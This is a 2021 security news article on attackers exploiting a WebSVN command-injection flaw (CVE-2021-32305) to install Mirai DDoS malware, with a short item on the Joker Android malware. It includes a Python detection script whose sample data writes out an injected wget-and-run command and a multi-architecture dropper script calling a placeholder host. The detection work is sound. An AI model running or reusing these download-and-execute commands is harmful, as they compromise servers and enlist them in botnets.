Posted on September 1, 2021 at 4:33 PM
Security researchers at Palo Alto Networks’ Unit 42 have discovered a vulnerability in WebSVN being exploited in the wild. According to the researchers, the attackers are exploiting the bug to plant variants of the Mirai DDoS malware on vulnerable servers.
The Hackers Brute-Force the Target Architecture
The "brute force" here is not password guessing: the attackers do not know what hardware the compromised server runs on, so their dropper script simply downloads and executes malicious Linux binaries built for every architecture they support, one after another. Whichever binary matches the host runs; the rest fail harmlessly with an incompatibility error. This speeds up their exploration of the target because no reconnaissance of the CPU architecture is needed.
The threat actors deliver only Linux binaries, even though WebSVN itself can run on different operating systems.
The Bug Has Been Patched But Hackers Are Still Probing
Although a patch for the vulnerability was released in May this year, threat actors are still exploiting installations that have not been updated. The vulnerability is tracked as CVE-2021-32305 and affects WebSVN 2.6.0 and earlier; it is fixed in version 2.6.1. Anyone still running an unpatched version remains exposed to the ongoing exploitation.
After a proof-of-concept was published in June, threat actors began attacking vulnerable versions and deploying variants of the Mirai DDoS malware.
As the researchers reported, the threat actors use the command injection to download a shell script, which then carries out the rest of the infection of the target system.
However, when abusing this type of bug, the attacker may not know important details of the target environment, such as the processor architecture and the operating system the web server is running on. Without that knowledge, a single dropped binary may simply fail to run, which makes a successful compromise harder.
“The shell script used in the next step of the attack shows how the attacker can overcome this issue,” the researchers added.
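The two stages described above (an injected command in a WebSVN request, followed by a shell script that tries binaries for every architecture) both leave detectable traces. The following Python script is an added example written for this page, not code from Unit 42 or the WebSVN project. It assumes an Apache/nginx combined-format access log, that the injection lands in the `search` parameter of WebSVN's `search.php` (the parameter named in CVE-2021-32305), and uses constructed log lines and a constructed dropper script as sample input; the IP addresses are from the RFC 5737 documentation range.

```python
"""Detection helpers for the WebSVN command-injection campaign.

Added example, not Unit 42's or WebSVN's code. Assumes combined-format access
logs and that the injection sits in the `search` parameter of search.php.
All sample data below is constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Shell metacharacters that never belong in a legitimate SVN search term.
META = re.compile(r"[;|`&\n]|\$\(")
# Download-then-execute fragment typical of a first-stage injected command.
DROPPER_CMD = re.compile(r"\b(wget|curl|tftp)\b.*\b(chmod|sh|bash)\b", re.S)
# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Architecture suffixes commonly seen on Mirai-style multi-architecture droppers.
ARCH_TOKENS = {
    "x86", "x86_64", "i586", "i686", "arm", "arm5", "arm6", "arm7", "aarch64",
    "mips", "mipsel", "mpsl", "ppc", "powerpc", "sh4", "m68k", "sparc", "spc",
}


def inspect_request(line):
    """Return None for non-search requests, else a verdict on the search term."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    if not parts.path.endswith("/search.php"):
        return None
    finding = {"ip": m.group("ip"), "verdict": "clean", "dropper": False, "payload": ""}
    for val in parse_qs(parts.query, keep_blank_values=True).get("search", []):
        # parse_qs decoded once; decode again so double-encoded payloads do not slip by.
        payload = unquote_plus(val)
        if META.search(payload):
            finding.update(verdict="command_injection", payload=payload,
                           dropper=bool(DROPPER_CMD.search(payload)))
            break
    return finding


def scan_log(lines):
    """Return only the findings that are not clean."""
    return [f for f in map(inspect_request, lines) if f and f["verdict"] != "clean"]


def classify_script(script):
    """Heuristic for the 'try every architecture' dropper stage."""
    tokens = {t.lower() for t in re.findall(r"[A-Za-z0-9_]+", script)}
    archs = sorted(tokens & ARCH_TOKENS)
    fetches = bool(re.search(r"\b(wget|curl|tftp)\b", script))
    executes = "chmod" in script and "./" in script
    return {"architectures": archs, "executes": executes,
            "is_dropper": fetches and executes and len(archs) >= 3}


# Constructed sample data (not real traffic).
SAMPLE_LOG = [
    '192.0.2.50 - - [29/Jun/2021:10:15:02 +0000] "GET /websvn/search.php?search=foo+bar&repname=proj HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jun/2021:10:16:40 +0000] "GET /websvn/search.php?search=%3Bwget+http%3A%2F%2F192.0.2.10%2Fx.sh+-O+%2Ftmp%2Fx.sh%3Bsh+%2Ftmp%2Fx.sh HTTP/1.1" 200 512 "-" "curl/7.64"',
    '192.0.2.51 - - [29/Jun/2021:10:17:01 +0000] "GET /websvn/listing.php?repname=proj HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [29/Jun/2021:10:18:13 +0000] "GET /websvn/search.php?search=%2524%2528id%2529 HTTP/1.1" 200 512 "-" "python-requests/2.25"',
]

SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://192.0.2.10/bins/bot.x86 -O x86; chmod +x x86; ./x86 websvn; rm -f x86
wget http://192.0.2.10/bins/bot.x86_64 -O x86_64; chmod +x x86_64; ./x86_64 websvn; rm -f x86_64
wget http://192.0.2.10/bins/bot.arm -O arm; chmod +x arm; ./arm websvn; rm -f arm
wget http://192.0.2.10/bins/bot.arm7 -O arm7; chmod +x arm7; ./arm7 websvn; rm -f arm7
wget http://192.0.2.10/bins/bot.mips -O mips; chmod +x mips; ./mips websvn; rm -f mips
wget http://192.0.2.10/bins/bot.mipsel -O mipsel; chmod +x mipsel; ./mipsel websvn; rm -f mipsel
"""

BENIGN_SCRIPT = "#!/bin/sh\napt-get update && apt-get install -y websvn\n"

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["verdict"], "dropper" if f["dropper"] else "", repr(f["payload"]))
    print(classify_script(SAMPLE_DROPPER))
```

The log check decodes the parameter a second time on purpose: `parse_qs` removes one layer of percent-encoding, so a payload sent as `%2524%2528id%2529` would otherwise look like the harmless string `%24%28id%29`. The script heuristic keys on what the text above describes, several architecture-specific downloads each followed by `chmod` and execution, rather than on any particular hostname or binary name, so it still fires when the attacker rotates infrastructure.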
The Malware Connects To The Hackers’ C2 Servers
After analysing the samples, the researchers stated that the threat actors carry out DDoS attacks using malware that shares code with the Mirai botnet family.
The samples were also packed with a modified version of the open-source packer UPX to reduce file size; altering the UPX headers is a common Mirai-family trick that stops the stock `upx -d` from unpacking the binary. When executed, the malware connects to the attackers’ command-and-control (C2) server and, once the connection is established, uses a custom text-based TCP protocol to exchange information with it.
According to the researchers, the malware family is designed primarily to carry out DDoS attacks, and it supports several attack methods that differ in technique and in the network protocol they abuse.
The researchers grouped the supported attacks into eight types, each suited to flooding a different kind of target.
The researchers expect the threat actors to keep exploiting such flaws to expand their pool of infected devices and so increase the capacity of their DDoS attacks. Users have therefore been advised to upgrade their WebSVN installations as soon as possible to avoid becoming victims.
Because the patch is already available, the overall impact of the exploitation should be limited. The installations that will fall victim are those whose operators have not applied the latest update.
Joker Virus Is Back Again
In another development, the notorious Joker malware has resurfaced in the wild. When it was last seen, in July, it was being delivered through apps on the Google Play Store.
The malware has now been detected in eight more apps on the Google Play Store. Google has removed them, but the malicious code may still be present in other apps.
The Joker Trojan belongs to the malware family Google tracks as Bread. Its main focus is mobile billing fraud: it authorises payments without the user’s knowledge. It can also read SMS messages and contacts on the infected device. Most alarming is that the malware can subscribe users to premium paid services without their consent or awareness.